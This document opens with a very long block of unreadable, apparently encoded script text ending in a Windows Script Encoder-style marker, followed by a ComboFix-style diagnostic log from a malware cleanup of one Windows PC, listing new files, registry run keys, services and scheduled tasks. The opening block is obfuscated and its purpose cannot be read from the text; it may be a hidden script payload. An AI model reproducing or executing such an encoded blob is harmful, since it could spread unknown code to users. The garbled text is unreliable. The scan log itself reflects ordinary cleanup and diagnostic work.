JzRcjG4pdX/7[Tp71H%*j945Sz/7[!5\HzRcj945Sz/7[Zp-gXRcjGt5JXk\[!5\HzR\SZ}\"Z%7[%t~SH/-ST}7I/%7[L4AJzk\ST}7I/%7[Nt$dXk\SZp7]ZR\[L4AJzk\SH1&d&m7J"m7pjb-Nr12Sfm7Jy1\}#z\Nr12Sfm7J.m-5.z\Nb,2J&1\Jy1\}#z\Nb0\}sbWi/%MS2N3S"^7robWiZRDJf92S"^7robWi;%.d&92S.m76szciZRDJf92S.^\dX,AJTp7S25*pj0MSz,AJ!5\JfIcpj0MSz,AJZp-d&IcpU%MJXO2J!5\JfIcpU0DdX%7[z,2SH%fSTo5Sf57[XO&JzR&STo5Sf57[H,fdXR&SZs5J&I\[XO&JzR&SZopd&57J"t5rwb-|z12I/%2Jy4p6oz\|z12I/%2J.t}}sz\|H,2]ZR&Jy4p6oz\|H1&"Z%2Jz%7I;,3Sz1yr327FXR\]/O2Sz1yr327FH%-"ZO2SH,y62A\FXR\]/O2SH1 }227Fz%7S2m-Nz071z,~iZO Jf1\Nz071z,~i;,+d&1\NH%7HXOAiZO Jf1\NH0\gX,~i/,ySH%*j945Sz/7[!5\HzRcj945Sz/7[Zp-gXRcjGt5JXk\[!5\HzRcjG4pdX/7[Tp71H%-ST}7I/%7[L4AJzk\ST}7I/%7[Nt$dXk\SZp7]ZR\[L4AJzk\SZ}\"Z%7[%t~SH/-Sz12Sfm7Jy1\}#z\Nr12Sfm7J.m-5.z\Nb,2J&1\Jy1\}#z\Nb1&d&m7J"m7pjb-Nr07robWiZRDJf92S"^7robWi;%.d&92S.m76szciZRDJf92S.^\}sbWi/%MS2N3S"^7Sz,AJ!5\JfIcpj0MSz,AJZp-d&IcpU%MJXO2J!5\JfIcpU0DdX,AJTp7S25*pj0MSz%7[XO&JzR&STo5Sf57[H,fdXR&SZs5J&I\[XO&JzR&SZopd&57[z,2SH%fSTo5Sf57Jy4p6oz\|z12I/%2J.t}}sz\|H,2]ZR&Jy4p6oz\|H1&"Z%2J"t5rwb-|z12I/%2JXR\]/O2Sz1yr327FH%-"ZO2SH,y62A\FXR\]/O2SH1 }227Fz%7I;,3Sz1yr327FXR\Jf1\Nz071z,~i;,+d&1\NH%7HXOAiZO Jf1\NH0\gX,~i/,yS2m-Nz071z,~iZO JzRcj945Sz/7[Zp-gXRcjGt5JXk\[!5\HzRcjG4pdX/7[Tp71H%*j945Sz/7[!5\HzR\ST}7I/%7[Nt$dXk\SZp7]ZR\[L4AJzk\SZ}\"Z%7[%t~SH/-ST}7I/%7[L4AJzk\Sz12Sfm7J.m-5.z\Nb,2J&1\Jy1\}#z\Nb1&d&m7J"m7pjb-Nr12Sfm7Jy1\}#z\Nr07robWi;%.d&92S.m76szciZRDJf92S.^\}sbWi/%MS2N3S"^7robWiZRDJf92S"^7Sz,AJZp-d&IcpU%MJXO2J!5\JfIcpU0DdX,AJTp7S25*pj0MSz,AJ!5\JfIcpj0MSz%7[H,fdXR&SZs5J&I\[XO&JzR&SZopd&57[z,2SH%fSTo5Sf57[XO&JzR&STo5Sf57J.t}}sz\|H,2]ZR&Jy4p6oz\|H1&"Z%2J"t5rwb-|z12I/%2Jy4p6oz\|z12I/%2JH%-"ZO2SH,y62A\FXR\]/O2SH1 }227Fz%7I;,3Sz1yr327FXR\]/O2Sz1yr327FH%-d&1\NH%7HXOAiZO Jf1\NH0\gX,~i/,yS2m-Nz071z,~iZO Jf1\Nz071z,~i;,+dXRcjGt5JXk\[!5\HzRcjG4pdX/7[Tp71H%*j945Sz/7[!5\HzRcj945Sz/7[Zp-gXR\SZp7]ZR\[L4AJzk\SZ}\"Z%7[%t~SH/-ST}7I/%7[L4AJzk\ST}7I/%7[Nt$dXk\SH,2J&1\Jy1\}#z\Nb1&d&m7J"m7pjb-Nr12Sfm7Jy1\}#z\Nr12Sfm7J.m-5.z\Nb%76szciZRDJf92S.^\}sbWi/%MS2N3S"^7robWiZRDJf92S"^7robWi;%.d&92S.m7JXO2J!5\JfIcpU0DdX,AJTp7S25*pj0MSz,AJ!5\JfIcpj0MSz,AJZp-d&IcpU%MJXR\[XO&JzR&SZopd&57[z,2SH%fSTo5Sf57[XO&JzR&STo5Sf57[H,fdXR&SZs5J&I\Jy4p6oz\|H1&"Z%2J"t5rwb-|z12I/%2Jy4p6oz\|z12I/%2J.t}}sz\|H,2]ZR&JXR\]/O2SH1 }227Fz%7I;,3Sz1yr327FXR\]/O2Sz1yr327FH%-"ZO2SH,y62A\FXR\Jf1\NH0\gX,~i/,yS2m-Nz071z,~iZO Jf1\Nz071z,~i;,+d&1\NH%7HXOAiZO JzRcjG4pdX/7[Tp71H%*j945Sz/7[!5\HzRcj945Sz/7[Zp-gXRcjGt5JXk\[!5\HzR\SZ}\"Z%7[%t~SH/-ST}7I/%7[L4AJzk\ST}7I/%7[Nt$dXk\SZp7]ZR\[L4AJzk\SH1&d&m7J"m7pjb-Nr12Sfm7Jy1\}#z\Nr12Sfm7J.m-5.z\Nb,2J&1\Jy1\}#z\Nb0\}sbWi/%MS2N3S"^7robWiZRDJf92S"^7robWi;%.d&92S.m76szciZRDJf92S.^\dX,AJTp7S25*pj0MSz,AJ!5\JfIcpj0MSz,AJZp-d&IcpU%MJXO2J!5\JfIcpU0DdX%7[z,2SH%fSTo5Sf57[XO&JzR&STo5Sf57[H,fdXR&SZs5J&I\[XO&JzR&SZopd&57J"t5rwb-|z12I/%2Jy4p6oz\|z12I/%2J.t}}sz\|H,2]ZR&Jy4p6oz\|H1&"Z%2Jz%7I;,3Sz1yr327FXR\]/O2Sz1yr327FH%-"ZO2SH,y62A\FXR\]/O2SH1 }227Fz%7S2m-Nz071z,~iZO Jf1\Nz071z,~i;,+d&1\NH%7HXOAiZO Jf1\NH0\gX,~i/,ySH%*j945Sz/7[!5\HzRcj945Sz/7[Zp-gXRcjGt5JXk\[!5\HzRcjG4pdX/7[Tp71H%-ST}7I/%7[L4AJzk\ST}7I/%7[Nt$dXk\SZp7]ZR\[L4AJzk\SZ}\"Z%7[%t~SH/-Sz12Sfm7Jy1\}#z\Nr12Sfm7J.m-5.z\Nb,2J&1\Jy1\}#z\Nb1&d&m7J"m7pjb-Nr07robWiZRDJf92S"^7robWi;%.d&92S.m76szciZRDJf92S.^\}sbWi/%MS2N3S"^7Sz,AJ!5\JfIcpj0MSz,AJZp-d&IcpU%MJXO2J!5\JfIcpU0DdX,AJTp7S25*pj0MSz%7[XO&JzR&STo5Sf57[H,fdXR&SZs5J&I\[XO&JzR&SZopd&57[z,2SH%fSTo5Sf57Jy4p6oz\|z12I/%2J.t}}sz\|H,2]ZR&Jy4p6oz\|H1&"Z%2J"t5rwb-|z12I/%2JXR\]/O2Sz1yr327FH%-"ZO2SH,y62A\FXR\]/O2SH1 }227Fz%7I;,3Sz1yr327FXR\Jf1\Nz071z,~i;,+d&1\NH%7HXOAiZO Jf1\NH0\gX,~i/,yS2m-Nz071z,~iZO JzRcj945Sz/7[Zp-gXRcjGt5JXk\[!5\HzRcjG4pdX/7[Tp71H%*j945Sz/7[!5\HzR\ST}7I/%7[Nt$dXk\SZp7]ZR\[L4AJzk\SZ}\"Z%7[%t~SH/-ST}7I/%7[L4AJzk\Sz12Sfm7J.m-5.z\Nb,2J&1\Jy1\}#z\Nb1&d&m7J"m7pjb-Nr12Sfm7Jy1\}#z\Nr07robWi;%.d&92S.m76szciZRDJf92S.^\}sbWi/%MS2N3S"^7robWiZRDJf92S"^7Sz,AJZp-d&IcpU%MJXO2J!5\JfIcpU0DdX,AJTp7S25*pj0MSz,AJ!5\JfIcpj0MSz%7[H,fdXR&SZs5J&I\[XO&JzR&SZopd&57[z,2SH%fSTo5Sf57[XO&JzR&STo5Sf57J.t}}sz\|H,2]ZR&Jy4p6oz\|H1&"Z%2J"t5rwb-|z12I/%2Jy4p6oz\|z12I/%2JH%-"ZO2SH,y62A\FXR\]/O2SH1 }227Fz%7I;,3Sz1yr327FXR\]/O2Sz1yr327FH%-d&1\NH%7HXOAiZO Jf1\NH0\gX,~i/,yS2m-Nz071z,~iZO Jf1\Nz071z,~i;,+dXRcjGt5JXk\[!5\HzRcjG4pdX/7[Tp71H%*j945Sz/7[!5\HzRcj945Sz/7[Zp-gXR\SZp7]ZR\[L4AJzk\SZ}\"Z%7[%t~SH/-ST}7I/%7[L4AJzk\ST}7I/%7[Nt$dXk\SH,2J&1\Jy1\}#z\Nb1&d&m7J"m7pjb-Nr12Sfm7Jy1\}#z\Nr12Sfm7J.m-5.z\Nb%76szciZRDJf92S.^\}sbWi/%MS2N3S"^7robWiZRDJf92S"^7robWi;%.d&92S.m7JXO2J!5\JfIcpU0DdX,AJTp7S25*pj0MSz,AJ!5\JfIcpj0MSz,AJZp-d&IcpU%MJXR\[XO&JzR&SZopd&57[z,2SH%fSTo5Sf57[XO&JzR&STo5Sf57[H,fdXR&SZs5J&I\Jy4p6oz\|H1&"Z%2J"t5rwb-|z12I/%2Jy4p6oz\|z12I/%2J.t}}sz\|H,2]ZR&JXR\]/O2SH1 }227Fz%7I;,3Sz1yr327FXR\]/O2Sz1yr327FH%-"ZO2SH,y62A\FXR\Jf1\NH0\gX,~i/,yS2m-Nz071z,~iZO Jf1\Nz071z,~i;,+d&1\NH%7HXOAiZO JzRcjG4pdX/7[Tp71H%*j945Sz/7[!5\HzRcj945Sz/7[Zp-gXRcjGt5JXk\[!5\HzR\SZ}\"Z%7[%t~SH/-ST}7I/%7[L4AJzk\ST}7I/%7[Nt$dXk\SZp7]ZR\[L4AJzk\SH1&d&m7J"m7pjb-Nr12Sfm7Jy1\}#z\Nr12Sfm7J.m-5.z\Nb,2J&1\Jy1\}#z\Nb1&}2!Wi/%MS2N3Sf22l+.UPj"A[q^1I9]Gp+V"#8Ao`(jsIq,d]M9&j!\x8+gAIG](":t~tTF"IZs-4To;i,_CMOK]!"\H3o~13FU]`V%U:^94`s;iDM}V^y]Vx\KZoZ5jYwC#s4pyY$.iowm!Y}}(9yCix??To_N"A}]qN-"4910sG .92]C9\ju~9KZoZ(!YGtfNj?A.j.ioGm3FgCV^KjugI.ToGjYIC2NKj2g\`s;}^MCC91]iw\?Zo29&sACow"pyNfHoow?+Y e!4ZiVj5pTodpV9~[`6$gsgHpZsd} T!8jjsni8spjoF5jI2^Ts;pjs$5T4~p sGCMO(}+9&ji4xpV}~i0VH":0!?ZI;t!wMC2^.]!a}.`Hw5j1oC#shpytU?"B"IP9~}(9Y]!^xKTHKj#N~}s,4"3x&?Z};HMOA]M9S]Vxx5`tALI~}UqMK0IGITt~1PAx]M9}\TO2}"#h?!VxC`so5DrlAV"]j"ft!xV#+D&KZsZ5FVntT9l?Z.4pis$jp.nt!lDj!9c4ot~}TsN^AF;dyt\}Gt"6"S}F\k !^/}AOI5js~}iqS}jt/4o$oKUIm]L4/toglHs2I?Uw4#.Vq`s"sN`FG :4t#FA*js414jsEjxAb]q9Mjtj4o$:.Uwn8XDiog5N"$_?i1~}`s$5jwAp`s~}LTh#!^f63lZl`o Vs\tTV~p`s$pio~pis~jl? 9Hr9$_?i1;P0}259Ap`s~}jwA}jwA8p"Ml`oxjs9\tTVgHwNBpTo~pis~}jwA}iwf49$o?i1AP0}254jj^V jjwA}jwA}iwAp`oH9V9\tTVjHwNBpT4}IhV~t!wA}iwApio~pi2H6`}254vj^V jkh#!^f}iwAp`oA5js~}iplHwNBpT2}IhV~C(a? 99pio~pis~}`s$5j&\j8V j(th#!^fPVlMl`ox5js~}is~p`s$p#$Z?hV~CV"? 99r9$o?i1~}`s$5jwAp`s~}:Kh8j^fi3lMl`oDjs9\tTV~p`s$pio~pis~jf9K 9|IP$o?i1~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}i9\HwNBp+3lIhV~t!wA}iwf.9$o?i1~}`s$5jxLp`sx}jwA}jwA^+"Ml`ox5js~}iI&HwNBpTo~pis~P x? 99pio~pisG[Aw259Ap`s~}(zh8j^f}iwAp`os1V1\tTV~p`s$p H}?hV~t!wA}iwf?P$D?i1~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5jsU\s5S.wmXl+]o+!6:]!\F V9c4oo"pis~]qId\2\Z+qqHP3xl]Fx* s4r+0os92}jC".V.AIH+iaMjVF`}jxFt39?m+BG1 Yb]2N$5jwZlVI_6(~A]:"jP Sc+0qwgYb]fN~.:AGK#eSIss:iyjDeV9&pio~psI0jAw3Ij4|p0sVt2ajC Xnis\INj2CC1~}is~j8mqHo2I?U.m sx2e+8Mlh3X.UVb]`.$jXZIw.kiK~H8.xyeVwAp`oMjLs4#q9A5yF l!]_.sIm 2I6 s1FH!ooIU1~]y6Tq.934Vs_nC9H8.xyeVwAp`os::,m#T*H.:1 No]oIUNN]F\Dih8/mq2"pssj\A}]`FtFIjIw[!wA}jxq s4?K^s55xNm#q9_5jN*4o]DIUIm#:gA#s\rIs#M.V,qC:..I39&p`s~}3"L8.\Wt39IsBEqxAN8PV85^N N ]w?U1b\3lX}ijMI#tMIss:#AFX:M8?my9~}jwA]3a/ %~rmy(y::6:\s58p`mxmq2`kpvt8.xyevwapiowku}:#..a\29/lV9_8f\lijxxHVwAp`oA5VV; %tGp`s9K3q~juNd62gHJ+8tNu[^piFa6Vt]1Vg ?`27]!X*]:"?iq^hI`1IIjV;]35Xrq,+.+VWS+,I}jwA}iIF5idWpTw;]A/A"jg j`/WCy9*838YCP^Ym8oKjZY5P+oXrVYKIu["jfIG62&!}ha p+\Mu9;t8A3\jWcI_Na[3"w#&cH%^k4ZoA5js~]rY;+GISz07|fmye(A!8p99piodNh,~}`s$5j\xI0t~jjwAP D1} 9Apjt}9x1 FfNjlqNF.TT7VNh sj9C#`yN+s~ITw0tswu`:Icp`pZe:aAijwA#PwVpqt:}2satfNl}AsX?qBA?i92P Ds[TOAIiH.l3N \^oA5j^WKb, Fyx?tkDHtswxmbO29L1AH3, pjs$p 4glqAai:gZ}iwfp tsr3san_NX\2wppN}2i!&!JXR\]u9ZIy[5tyI i N~p`V+1+HlIoq2J x2}#4I. [^}r,;[Zs$5?Ofp oZ]jwA}jgAt!IcpNeh9jp8\z,Hj^V}lV3W?u}~8F~X}i4IHq\.j *:\8s `yg.+qn^tkr\[!8ACs4INZo}U2t"##s~p`,+j![^}r,5[!wAt+g3pVB~pisU[o1j\ j:SZs2}jwAJ!g2n9~qm \!`M*5\!.~}s5*p ]~lqAZnC9*[+jyIPt2NfWH\ss\U2"SpNp76s~A}jwp[!D5Sy[qqZ,~i#A2l:tKI9]~|TpM}K0h}s06i3Mm"IU8Zofd&1cp`s&ij^&t(gst"41j.t*\jsst%t~}A2zK3BAK3qy}.w/JzRcpiohmT.AHy1o:DtKsF;]jxA}jxCt+\yj`oI"js0]rYtjs}UmULZ!90]jDHth\AIuLZ4!p2joIVn!^\?U%S f"Iif^rHT^xK`LyqC}aC"HM1 VPp tsr3sAHF^LP lIKV}2V.gtZt/gx9jpNI~ijSXj(5*FT^!IN4p}j5Mj NNKZ.rSqBs.o2Z jW*6iww?#]s1oA$j q.dXR\m^1`i2wn].T\t3xn?8B2:ftWCqo7p`1er3o~pis2tjwMiUjyK#27N3.g[ 1d9!Acp`s}jM9xF!I\}P4wK^BAm!VKeTqSIs,"Kiq7N!pMj(5*63^rIrO~jTIWt89Bm.w&}sI^8F~!CFT\CPzh?`dc\ymWijYG?q5fSz0Xr 9a\sT! ugEpTB~IuA;#ssVd gI1s*s\s^AijwA}ixAp`oA5&N\tTV~p`s$jio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}is~p`s$pio~pis~}jwA}iwApio~pis~}`s$5jwAp`s~}jwA}jwA}iwAp`oA5js~}i2Oqb3{f}Gxq.a8x5y\sDN(j)04fbO\G/H;o0W81l^&"V8?l?[ l!lqqVd3V![!.H42AP}pByl 1^^Xl1epxyl!ok(PW+]y.T"Mj/}qN4[MjM8&xM[ lLNVs\(VA7C *Z}oqG|![4q!Y^^:lV89tXSh]k4/AqCo9T9w/j_97[MjL[Z0/F!93qA)Wq!9l[!.((j!dq#x4Up.\VZ/ qj94U}.Hs!k 8.B(x5yH^Y9p?0oFsD98U"pN_BNn?3aFj*x4 }-l+iK9ubkBCzEP!jE}f]KS9AWHGbdxMOh|:/g/o0W Fg*^f"V4UX?9*ZC F^S0V;N!#H4fA:t(x C gVmzXg5p9.CVsdoKKvIy.Z]Mj/t9t[!jM42BM9*N[!V74^A-l XZ}pqKFM9t(ujy}p(.Hr*08VhL5 w/4wNa8:"\[F~X8+gA|UAW\ pT}/t(p VT}#O9(j6(}x^!t#DN(ja(.iV![GHzo?X4.`V![ftXp?X4#i^ENG\Xo?3TFoYx4 I}NuB9|j3aF?l98U\\l+iK9ubkB_bdtZShSGba6hZ|WpZ|e+w!5yL1;x/g/U!gZ 1d} #S|92a6hZ|tp4wN9d{Bb#*Ep@#@&id'lcI!U`a_EPb+a~f+x7llr~!Bqbi@#@&i8@#@&7^mY^tvn#@#@&7`@#@&dN@#@&8@#@&1sK/nv#pzJUpAA==^#~@
.
(((((((((((((((((((((((((   Files Created from 2014-09-28 to 2014-10-28  )))))))))))))))))))))))))))))))
.
.
2014-10-28 13:57 . 2014-10-28 13:57 -------- d-----w- c:\users\Default\AppData\Local\temp
2014-10-28 13:57 . 2014-10-28 13:57 -------- d-----w- c:\users\Administrator\AppData\Local\temp
2014-10-27 21:43 . 2014-10-27 21:43 62576 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{03F84622-DC44-49F0-B10F-83765017C362}\offreg.dll
2014-10-27 21:24 . 2014-10-27 21:24 -------- d-----w- c:\programdata\Sophos
2014-10-27 21:24 . 2014-10-27 21:24 73728 ----a-r- c:\users\KELI\AppData\Roaming\Microsoft\Installer\{B829E117-D072-41EA-9606-9826A38D34C1}\SVRTgui.exe1_810EDD9E2F0A4E2BACF86673C38D9F48.exe
2014-10-27 21:24 . 2014-10-27 21:24 73728 ----a-r- c:\users\KELI\AppData\Roaming\Microsoft\Installer\{B829E117-D072-41EA-9606-9826A38D34C1}\SVRTgui.exe_810EDD9E2F0A4E2BACF86673C38D9F48.exe
2014-10-27 21:24 . 2014-10-27 21:24 73728 ----a-r- c:\users\KELI\AppData\Roaming\Microsoft\Installer\{B829E117-D072-41EA-9606-9826A38D34C1}\ARPPRODUCTICON.exe
2014-10-27 21:24 . 2014-10-27 21:24 -------- d-----w- c:\program files\Sophos
2014-10-27 21:21 . 2014-10-27 21:21 20 ----a-w- c:\windows\system32\drivers\SMR430.dat
2014-10-27 20:54 . 2014-10-27 21:21 104120 ----a-w- c:\windows\system32\drivers\SMR430.SYS
2014-10-27 20:54 . 2014-10-27 21:21 -------- d-----w- c:\users\KELI\AppData\Local\NPE
2014-10-27 20:54 . 2014-10-27 20:54 -------- d-----w- c:\programdata\Norton
2014-10-27 20:11 . 2014-10-27 20:13 -------- d-----w- C:\FRST
2014-10-27 19:28 . 2014-10-27 20:41 114904 ----a-w- c:\windows\system32\drivers\MBAMSwissArmy.sys
2014-10-27 19:28 . 2014-10-27 19:29 -------- d-----w- c:\program files\Malwarebytes Anti-Malware
2014-10-27 19:28 . 2014-10-27 19:28 -------- d-----w- c:\programdata\Malwarebytes
2014-10-27 19:28 . 2014-10-01 15:11 51928 ----a-w- c:\windows\system32\drivers\mwac.sys
2014-10-27 19:28 . 2014-10-01 15:11 75480 ----a-w- c:\windows\system32\drivers\mbamchameleon.sys
2014-10-27 19:28 . 2014-10-01 15:11 23256 ----a-w- c:\windows\system32\drivers\mbam.sys
2014-10-27 19:28 . 2014-10-27 19:28 -------- d-----w- c:\users\KELI\AppData\Local\Programs
2014-10-27 18:26 . 2014-10-14 20:13 8901368 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{03F84622-DC44-49F0-B10F-83765017C362}\mpengine.dll
2014-10-22 16:44 . 2014-10-22 21:04 -------- d--h--w- c:\programdata\{D9E629DC-CB1C-4A97-9900-81922B4EFFD4}
2014-10-15 17:56 . 2014-07-17 01:39 3221504 ----a-w- c:\windows\system32\mstscax.dll
2014-10-01 13:16 . 2014-09-25 01:40 519680 ----a-w- c:\windows\system32\qdvd.dll
.
.
.
((((((((((((((((((((((((((((((((((((((((   Find3M Report   ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2014-10-20 14:29 . 2014-07-09 13:30 163504 ----a-w- c:\programdata\Microsoft\Windows\Sqm\Manifest\Sqm10145.bin
2014-10-02 19:53 . 2011-03-21 15:46 231568 ------w- c:\windows\system32\MpSigStub.exe
2014-09-24 15:16 . 2012-04-03 13:22 701104 ----a-w- c:\windows\system32\FlashPlayerApp.exe
2014-09-24 15:16 . 2011-06-10 12:53 71344 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2014-09-09 21:47 . 2014-09-24 13:28 2048 ----a-w- c:\windows\system32\tzres.dll
2014-08-29 17:00 . 2009-08-18 18:30 564632 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\wlidui.dll
2014-08-29 17:00 . 2009-08-18 18:24 23256 ----a-w- c:\programdata\Microsoft\IdentityCRL\production\ppcrlconfig600.dll
2014-08-23 01:46 . 2014-08-28 13:20 305152 ----a-w- c:\windows\system32\gdi32.dll
2014-08-01 11:35 . 2014-09-10 13:26 793600 ----a-w- c:\windows\system32\TSWorkspace.dll
.
.
(((((((((((((((((((((((((((((((((((((   Reg Loading Points   ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown 
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt1]
@="{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt2]
@="{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\DropboxExt3]
@="{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}"
[HKEY_CLASSES_ROOT\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B}]
2014-06-24 22:04 131480 ----a-w- c:\users\KELI\AppData\Roaming\Dropbox\bin\DropboxExt.24.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"swg"="c:\program files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" [2011-03-21 39408]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"RtHDVCpl"="c:\program files\Realtek\Audio\HDA\RtHDVCpl.exe" [2009-07-03 7596576]
"picon"="c:\program files\Common Files\Intel\Privacy Icon\PrivacyIconClient.exe" [2009-07-24 796696]
"PDF Complete"="c:\program files\PDF Complete\pdfsty.exe" [2009-06-18 563736]
"Microsoft Default Manager"="c:\program files\Microsoft\Search Enhancement Pack\Default Manager\DefMgr.exe" [2010-05-10 439568]
"MVS Splash"="c:\program files\McAfee\Managed VirusScan\Agent\Splash.exe" [2009-11-17 562496]
"McAfee Managed Services Tray"="c:\program files\McAfee\Managed VirusScan\Agent\StartMyAgtTry.Exe" [2009-11-17 95552]
"SiteAdvisor"="c:\program files\SiteAdvisor\6173\SiteAdv.exe" [2007-08-28 36640]
"IgfxTray"="c:\windows\system32\igfxtray.exe" [2010-08-26 136216]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2010-08-26 171032]
"Persistence"="c:\windows\system32\igfxpers.exe" [2010-08-26 170520]
"Adobe ARM"="c:\program files\Common Files\Adobe\ARM\1.0\AdobeARM.exe" [2013-11-21 959904]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
"NCPluginUpdater"="c:\program files\Hewlett-Packard\HP Health Check\ActiveCheck\product_line\NCPluginUpdater.exe" [2014-10-22 21720]
.
c:\users\KELI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
Dropbox.lnk - c:\users\KELI\AppData\Roaming\Dropbox\bin\Dropbox.exe /systemstartup [2014-9-12 36414624]
.
c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\
Scanner File Utility.lnk - c:\program files\Kyocera\FileUtility\NsCatCom.exe [2011-3-24 335872]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"ConsentPromptBehaviorAdmin"= 5 (0x5)
"ConsentPromptBehaviorUser"= 3 (0x3)
"EnableUIADesktopToggle"= 0 (0x0)
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\drivers32]
"aux"=wdmaud.drv
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiSpyware]
"DisableMonitoring"=dword:00000001
.
[HKEY_LOCAL_MACHINE\software\microsoft\security center\Monitoring\McAfeeAntiVirus]
"DisableMonitoring"=dword:00000001
.
R3 IEEtwCollectorService;Internet Explorer ETW Collector Service;c:\windows\system32\IEEtwCollector.exe [2014-09-19 108032]
R3 MBAMSwissArmy;MBAMSwissArmy;c:\windows\system32\drivers\MBAMSwissArmy.sys [2014-10-27 114904]
R3 TsUsbFlt;TsUsbFlt;c:\windows\system32\drivers\tsusbflt.sys [2010-11-20 52224]
R3 WatAdminSvc;Windows Activation Technologies Service;c:\windows\system32\Wat\WatAdminSvc.exe [2011-01-07 1343400]
R3 WSDScan;WSD Scan Support via UMB;c:\windows\system32\drivers\WSDScan.sys [2009-07-14 20480]
R4 myAgtSvc;McAfee Virus and Spyware Protection Service;c:\program files\McAfee\Managed VirusScan\Agent\myAgtSvc.Exe [2009-11-17 221024]
S1 SMR430;Symantec SMR Utility Service 4.3.0;c:\windows\System32\drivers\SMR430.SYS [2014-10-27 104120]
S2 HP Support Assistant Service;HP Support Assistant Service;c:\program files\Hewlett-Packard\HP Support Framework\hpsa_service.exe [2013-11-04 92160]
S2 pdfcDispatcher;PDF Document Manager;c:\program files\PDF Complete\pdfsvc.exe [2009-06-18 635416]
S2 regi;regi;c:\windows\system32\drivers\regi.sys [2007-04-18 11032]
S2 UNS;Intel® Management and Security Application User Notification Service;c:\program files\Common Files\Intel\Privacy Icon\UNS\UNS.exe [2009-07-24 2066968]
S3 e1kexpress;Intel® PRO/1000 PCI Express Network Connection Driver K;c:\windows\system32\DRIVERS\e1k6232.sys [2009-09-02 202408]
S3 netr28;Ralink 802.11n Wireless Driver for Windows Vista;c:\windows\system32\DRIVERS\netr28.sys [2009-07-13 530944]
.
.
--- Other Services/Drivers In Memory ---
.
*NewlyCreated* - 65130187
*Deregistered* - 65130187
.
[HKEY_LOCAL_MACHINE\software\microsoft\active setup\installed components\{8A69D345-D564-463c-AFF1-A69D9E530F96}]
2014-10-28 13:30 1089352 ----a-w- c:\program files\Google\Chrome\Application\38.0.2125.111\Installer\chrmstp.exe
.
Contents of the 'Scheduled Tasks' folder
.
2014-10-28 c:\windows\Tasks\Adobe Flash Player Updater.job
- c:\windows\system32\Macromed\Flash\FlashPlayerUpdateService.exe [2012-04-03 15:16]
.
2014-10-28 c:\windows\Tasks\G2MUpdateTask-S-1-5-21-3621039740-3434257137-3815352865-1001.job
- c:\users\KELI\AppData\Local\Citrix\GoToMeeting\1865\g2mupdate.exe [2014-10-27 16:11]
.
2014-10-28 c:\windows\Tasks\GoogleUpdateTaskMachineCore.job
- c:\program files\Google\Update\GoogleUpdate.exe [2011-03-21 13:24]
.
2014-10-28 c:\windows\Tasks\GoogleUpdateTaskMachineUA.job
- c:\program files\Google\Update\GoogleUpdate.exe [2011-03-21 13:24]
.
2014-10-27 c:\windows\Tasks\HPCeeScheduleForKELI.job
- c:\program files\Hewlett-Packard\HP Ceement\HPCEE.exe [2011-07-15 09:43]
.
.
------- Supplementary Scan -------
.
IE: E&xport to Microsoft Excel - c:\progra~1\MICROS~1\Office12\EXCEL.EXE/3000
Trusted Zone: //about.htm/
Trusted Zone: //Exclude.htm/
Trusted Zone: //LanguageSelection.htm/
Trusted Zone: //Message.htm/
Trusted Zone: //MyAgttryCmd.htm/
Trusted Zone: //MyAgttryNag.htm/
Trusted Zone: //MyNotification.htm/
Trusted Zone: //NOCLessUpdate.htm/
Trusted Zone: //quarantine.htm/
Trusted Zone: //ScanNow.htm/
Trusted Zone: //strings.vbs/
Trusted Zone: //Template.htm/
Trusted Zone: //Update.htm/
Trusted Zone: //VirFound.htm/
Trusted Zone: mcafee.com\*
Trusted Zone: mcafeeasap.com\betavscan
Trusted Zone: mcafeeasap.com\vs
Trusted Zone: mcafeeasap.com\www
TCP: Interfaces\{47CED9F3-6727-4E66-BBD7-559438BB948D}: NameServer = 167.206.245.130,167.206.245.129
.
.
[HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services\pdfcDispatcher]
